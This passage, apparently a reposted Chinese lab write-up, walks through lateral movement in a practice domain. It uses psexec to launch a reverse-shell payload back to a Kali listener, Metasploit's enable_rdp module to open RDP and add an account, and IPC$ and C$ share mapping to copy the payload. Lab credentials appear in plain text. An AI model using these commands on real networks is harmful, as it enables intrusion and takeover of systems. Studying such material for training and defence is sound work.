
在kali上開啟監聽(6666端口),使用psesec.exe.啟動靶機上的shell.exe

p**ec.exe 192.168.141.100 -u administrator -p hb123456,./$ c:shell.exe
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

成功反彈shell上線:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在kali裡接收到了shell,可在meterpreter中管理shell,開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在4号機遠端登入3号機

使用者名:hiroAdministrator 密碼:hb123456,./$

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

3号機到1号機

在3号機上,使用以下指令建立IPC$連接配接

net use 192.168.141.111 "hb123456,./$" /user:"Administrator"
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在3号機上,使用以下指令,将目标靶機的C槽映射到本地Z盤

net use z: 192.168.141.111c$
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用copy指令将先前生成的shell.exe拷貝至靶機C槽

copy shell.exe 192.168.141.111c$
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在kali上開啟監聽(6666端口),使用p**ec.exe.啟動靶機上的shell.exe

p**ec.exe 192.168.141.111 -u hiroAdministrator -p hb123456,./$ c:shell.exe
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

成功擷取shell

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

打開一号機3389

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用使用者名:hiroAdministrator 密碼: hb123456,./$登入

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

成功拿下一号機,實驗成功!

轉載自:https://bbs.ichunqiu.com/thread-49988-1-1.html